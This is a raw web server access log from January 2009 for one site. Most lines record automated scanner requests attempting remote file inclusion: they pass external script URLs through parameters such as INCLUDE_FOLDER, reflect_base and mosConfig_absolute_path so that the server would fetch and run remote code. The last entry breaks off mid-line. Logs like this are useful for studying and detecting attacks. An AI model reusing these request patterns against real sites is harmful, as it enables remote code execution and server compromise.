193.86.246.132 - - [04/Jan/2009:19:19:38 -0800] "GET /?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.813" "www.vspeaking.com"
216.180.251.146 - - [04/Jan/2009:19:19:42 -0800] "GET /?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.180.251.146 - - [04/Jan/2009:19:19:42 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 200 2654 "-" "libwww-perl/5.810" "www.vspeaking.com"
210.183.36.251 - - [04/Jan/2009:19:20:18 -0800] "GET /?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.63" "www.vspeaking.com"
210.183.36.251 - - [04/Jan/2009:19:20:18 -0800] "GET /logs/access.log/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
210.183.36.251 - - [04/Jan/2009:19:20:18 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 200 2654 "-" "libwww-perl/5.63" "www.vspeaking.com"
211.202.2.220 - - [04/Jan/2009:19:22:32 -0800] "GET /?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.202.2.220 - - [04/Jan/2009:19:22:33 -0800] "GET /logs/access.log/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.202.2.220 - - [04/Jan/2009:19:22:33 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 200 2654 "-" "libwww-perl/5.79" "www.vspeaking.com"
193.86.246.132 - - [04/Jan/2009:19:22:35 -0800] "GET /logs/access_081006.log/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.vspeaking.com"
216.180.251.146 - - [04/Jan/2009:19:24:04 -0800] "GET /logs/access_081006.log/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
218.234.21.131 - - [04/Jan/2009:19:24:14 -0800] "GET /?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
218.234.21.131 - - [04/Jan/2009:19:24:14 -0800] "GET /logs/access.log/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
218.234.21.131 - - [04/Jan/2009:19:24:15 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 200 2654 "-" "libwww-perl/5.79" "www.vspeaking.com"
210.183.36.251 - - [04/Jan/2009:19:24:29 -0800] "GET /logs/access_081006.log/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
91.142.214.201 - - [04/Jan/2009:19:24:44 -0800] "GET /logs/access_081208.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.vspeaking.com"
91.142.214.201 - - [04/Jan/2009:19:24:56 -0800] "GET /logs/access_081208.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.vspeaking.com"
211.202.2.220 - - [04/Jan/2009:19:25:03 -0800] "GET /logs/access_081006.log/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
66.160.185.20 - - [04/Jan/2009:19:25:37 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
66.160.185.20 - - [04/Jan/2009:19:25:38 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
66.232.142.27 - - [04/Jan/2009:19:25:58 -0800] "GET /logs/access.log/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
66.232.142.27 - - [04/Jan/2009:19:25:58 -0800] "GET /?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
66.232.142.27 - - [04/Jan/2009:19:25:58 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 200 2654 "-" "libwww-perl/5.79" "www.vspeaking.com"
218.234.21.131 - - [04/Jan/2009:19:27:51 -0800] "GET /logs/access_081006.log/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:19:28:36 -0800] "GET /logs/class_item.p